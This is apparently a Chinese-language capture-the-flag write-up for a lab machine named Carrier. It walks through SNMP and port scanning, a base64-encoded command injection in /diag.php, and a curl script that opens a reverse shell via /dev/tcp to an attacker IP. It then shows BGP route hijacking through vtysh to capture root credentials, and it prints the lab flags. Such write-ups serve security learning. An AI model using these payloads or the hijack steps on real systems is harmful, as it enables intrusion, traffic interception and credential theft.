Carrier SNMP+CW-1000-X RCE+BGP劫持权限提升技术分析<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
目标IP: 10.10.10.105<\/code><\/p>
使用以下命令进行初始扫描：<\/p>
ip=<\/span>'10.10.10.105'<\/span>; itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span> 
<\/span><\/span>    echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>; 
<\/span><\/span>    ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>; 
<\/span><\/span>    if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span> 
<\/span><\/span>        echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>; 
<\/span><\/span>        nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>; 
<\/span><\/span>    else<\/span> 
<\/span><\/span>        echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>; 
<\/span><\/span>    fi<\/span>; 
<\/span><\/span>else<\/span> 
<\/span><\/span>    echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>; 
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 7.6p1 Ubuntu 4<\/li>
80\/tcp: Apache httpd 2.4.18 (Ubuntu)<\/li>
<\/ul>
1.2 SNMP信息收集<\/h3>
使用SNMP获取设备信息：<\/p>
snmpwalk -c public -v 1<\/span> 10.10.10.105
<\/span><\/span><\/code><\/pre>获取到设备标识符：NET_45JDX23<\/code><\/p>
1.3 Web目录扫描<\/h3>
使用feroxbuster进行目录扫描：<\/p>
feroxbuster -u 'http:\/\/10.10.10.105\/'<\/span>
<\/span><\/span><\/code><\/pre>发现重要信息：<\/p>

默认管理员凭据：admin:NET_45JDX23<\/code><\/li>
诊断页面：\/diag.php<\/code><\/li>
<\/ul>
2. 远程代码执行(RCE)漏洞利用<\/h2>
2.1 发现漏洞<\/h3>
在\/diag.php<\/code>页面存在命令注入漏洞，参数check<\/code>可被利用：<\/p>
http:\/\/10.10.10.105\/diag.php?check=<\/span>cXVhZ2dhO3BpbmcgLWMgMSAxMC4xMC4xNi4zMw==<\/span>
<\/span><\/span><\/code><\/pre>(base64解码后为：quagga;ping -c 1 10.10.16.33<\/code>)<\/p>
2.2 构造反弹Shell<\/h3>
使用以下脚本获取反弹shell：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>URL=<\/span>"http:\/\/10.10.10.105\/diag.php"<\/span>
<\/span><\/span>COOKIE=<\/span>"PHPSESSID=vsn8nsns2hmn9jnmvu3u576s10"<\/span>
<\/span><\/span>CMD=<\/span>"\/bin\/bash -i >& \/dev\/tcp\/10.10.16.33\/443 0>&1"<\/span>
<\/span><\/span>B64_CMD=<\/span>$(<\/span>echo -n "root;<\/span>$CMD"<\/span> | base64)<\/span>
<\/span><\/span>curl -s -X POST "<\/span>$URL"<\/span> -H "Content-Type: application\/x-www-form-urlencoded"<\/span> -H "Cookie: <\/span>$COOKIE"<\/span> --data-urlencode "check=<\/span>$B64_CMD"<\/span>
<\/span><\/span><\/code><\/pre>2.3 获取用户权限<\/h3>
成功获取shell后找到用户flag：<\/p>
13e98f59a7de80e9aa34e8473f592e37
<\/code><\/pre>
3. 权限提升：BGP劫持<\/h2>
3.1 分析BGP配置<\/h3>
查看Quagga BGP配置：<\/p>
cat \/etc\/quagga\/bgpd.conf
<\/span><\/span><\/code><\/pre>关键配置：<\/p>
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0\/21
 network 10.101.16.0\/21
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
<\/code><\/pre>
3.2 网络拓扑分析<\/h3>
使用nmap扫描相邻网络：<\/p>
.\/nmap -Pn -e eth1 10.120.15.0\/24 10.120.16.0\/24 10.120.17.0\/24 --min-rate 1000<\/span> --open
<\/span><\/span>.\/nmap -Pn -e eth2 10.120.15.0\/24 10.120.16.0\/24 10.120.17.0\/24 --min-rate 1000<\/span> --open
<\/span><\/span><\/code><\/pre>发现关键主机：10.120.15.10<\/code> (开放FTP, SSH, domain服务)<\/p>
3.3 BGP劫持实施步骤<\/h3>

进入vtysh配置模式：<\/li>
<\/ol>
vtysh
<\/span><\/span><\/code><\/pre>
配置BGP劫持：<\/li>
<\/ol>
configure terminal
<\/span><\/span>ip prefix-list maptnh permit 10.120.15.0\/25
<\/span><\/span>route-map to-as200 permit 10<\/span>
<\/span><\/span>match ip address prefix-list maptnh
<\/span><\/span>set community no-export
<\/span><\/span>route-map to-as200 permit 20<\/span>
<\/span><\/span>route-map to-as300 deny 10<\/span>
<\/span><\/span>match ip address prefix-list maptnh
<\/span><\/span>route-map to-as300 permit 20<\/span>
<\/span><\/span>router bgp 100<\/span>
<\/span><\/span>network 10.120.15.0 mask 255.255.255.128
<\/span><\/span>end
<\/span><\/span>clear ip bgp *
<\/span><\/span><\/code><\/pre>
验证配置：<\/li>
<\/ol>
show ip bgp neighbors 10.78.10.2 advertised-routes
<\/span><\/span><\/code><\/pre>3.4 获取root权限<\/h3>
劫持成功后，捕获到root凭据：<\/p>
username:root
password:BGPtelc0rout1ng
<\/code><\/pre>
使用SSH登录获取root权限：<\/p>
ssh root@10.10.10.105
<\/span><\/span><\/code><\/pre>获取root flag：<\/p>
ba0ec18cfa0f83cf7eeab8c90a30cd2e
<\/code><\/pre>
4. 技术总结<\/h2>

信息收集<\/strong>：通过SNMP获取设备标识符，发现默认凭据<\/li>
Web漏洞利用<\/strong>：利用diag.php的命令注入漏洞获取初始访问权限<\/li>
BGP劫持<\/strong>：分析网络拓扑，通过修改BGP路由表劫持流量<\/li>
权限提升<\/strong>：利用BGP劫持捕获敏感信息，获取root权限<\/li>
<\/ol>
此攻击链展示了从信息收集到权限提升的完整过程，特别强调了BGP配置错误导致的严重安全问题。<\/p>